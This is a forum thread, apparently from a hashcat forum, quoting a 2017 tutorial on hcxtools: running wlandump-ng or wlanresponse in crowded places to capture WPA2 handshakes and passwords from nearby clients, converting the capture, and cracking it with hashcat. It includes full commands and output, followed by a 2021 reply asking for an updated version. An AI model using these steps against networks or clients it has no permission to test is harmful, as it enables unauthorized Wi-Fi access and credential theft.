hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
(07-22-2017, 10:07 AM)ZerBea Wrote: basic tutorial about the features to capture passwords from wlantraffic

Choose a place where you do expect to receive many, many clients.
run wlandump-ng or wlanresponse for a while (one or more hours) using this options:

on a notebook
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20

on a raspberry
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L

mydevice is your WLAN device (it must be running allready in monitor mode on a real device - do not use virtual devices like mon0).

Please download and use the attached test.cap for this tutorial
Extract and copy the cap to a folder and open a terminal inside.

Let's check the cap:

$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless

The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there are informations inside, other tools are not able to strip.

Let's convert the cap:

$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)

You can see that there's a valid WPA2 handshakles inside and that
wlandump-ng/wlanresponse initiates the authentication with the client.
No accesspint captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx).

$ ls
test.hccapx test.cap  wordlist

now sort our wordlist
$ sort wordlist | uniq > wordlistsort
you need to do this, because there are many dupes inside.

$ ls
test.hccapx test.cap  wordlist wordlistsort

now run hashcat
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
Guess.Base.......: File (wordlistsort)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:        0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8

Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from wlantraffic.

It's a good Idea to add/copy/cat the wordlist to your wordlist(s) - everytime you run wlancap2hcx on new cap files.

Hello ZerBea, I hope you are doing well.
I tried to understand and reproduce this exact same procedure in hopes to recover the PSK if its present in the network traffic. As these tools are not available anymore because they are updated to the latest hcxtools, I am unable to reproduce this.

Can you please update this exact tutorial using the latest set of hcxtools?


Messages In This Thread
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - by sata - 03-30-2021, 06:31 PM
wlandump-ng vs hcxdumptool - by hulley - 02-10-2018, 10:26 PM